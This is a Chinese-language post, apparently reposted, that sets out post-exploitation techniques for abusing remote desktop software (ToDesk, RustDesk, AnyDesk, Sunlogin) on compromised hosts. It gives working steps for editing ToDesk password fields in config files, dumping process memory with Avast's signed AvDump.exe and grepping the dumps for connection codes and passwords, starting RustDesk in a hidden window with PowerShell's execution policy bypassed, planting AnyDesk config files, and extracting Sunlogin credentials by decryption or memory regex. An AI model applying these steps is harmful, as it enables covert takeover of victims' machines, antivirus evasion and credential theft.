远程 desk 工具利用总结
在平时打 web 或者打内网时难免遇到一种情况,就是需要以当前用户身份,通过远程桌面的形式操控主机。已达到退杀软、操控聊天软件以及其他需要交互式的操作,这个时候就需要借助远程桌面软件来操控目标机。
NO.1 Todesk
根据目标软件安装情况有以下两种利用方法
1.目标机已有完整版 todesk。
1)改配置文件。
老版本可替换至本地查看密码(此法在最近更新的几个版本中已经失效),新版本只可更改密码。
改 C:\Program Files (x86)\ToDesk 下 conf.ini 文件 tempAuthPassEx 字段
tga5h42d
65tu07zr
kill 进程重启即可。
2)内存读密码
userInfo.json和devlist_xx.json文件有 userid(连接码)
dump 内存,搜索连接码,上下几行会有密码
4.3.3 以下临时密码为 6 位数字
2.目标机无 todest,安装官方精简版
dump 内存 仅测试 4.3.3.0 运行精简版(需 bypassUAC),dump 子进程(主进程为 system 权限)
AvDump.exe 是 Avast 杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有 Avast 杀软数字签名。
可通过定位被控端版本 4.3.3.0 、主机名、公网 ip、系统版本(更准确),来找到相应位置。
*shell 快速提取,不一定有效,密码可能在输出的前后两行
设置 utf-8
CHCP 65001
1)连接码
shell findstr "20220829" C:\Users\Public\tod.dmp 时间定位
shell findstr "ip 地址" C:\Users\Public\tod.dmp ip 定位
2)连接密码
主要靠系统版本号定位,具体看连接码定位字符串显示的版本号
shell findstr "19044" C:\Users\Public\tod.dmp
通常为 8 位数,数字字母混合
NO.2 Rustdesk
单机版,无需绕 UAC,但部分软件操作会提示 UAC。
配置文件地址
C:\Users\username\AppData\Roaming\RustDesk\config\RustDesk.toml
使用 powershell 可以无窗口执行
powershell-executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/user/rust.exe'
第一次运行 rustdesk 会生成配置文件,然后结束进程
taskkill/f /t /im rust.exe
在配置文件中添加密码,6 位数密码
在内网还可配置直连功能 RustDesk2.toml
NO.3 Anydesk
复制本地 C:\Users\guoguang\AppData\Roaming\AnyDesk 下四个文件到远程主机上
删除本地文件,重启开启连接
NO.4 向日葵
自从向日葵 12.5 版本后,原 encry_pwd 和 fastcode 字段已经不在配置文件 config.ini 和注册表
HKEY_USERS.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo 内
解决方案一
根据分析,上述字段移动至 C:\ProgramData\Oray\SunloginClient\sys_config.ini 中
此配置文件默认需要 SYSTEM 权限才可以读取
提权后拿到 id 和加密后的密码,经测试算法没变,通过现有项目解密即可 https://github.com/wafinfo/Sunflower_get_Password
解决方案二
通过 dump 内存的方式匹配明文字符串获取,参考: https://red.rizhan.icu/?thread-176.htm
id 正则为 k[0-9]{8,}密码正则为>[a-z0-9]{6},每次刷新后密码的均会保存在内存中
文章转载自:PYkiller
还未添加个人签名 2023-06-19 加入
还未添加个人简介
评论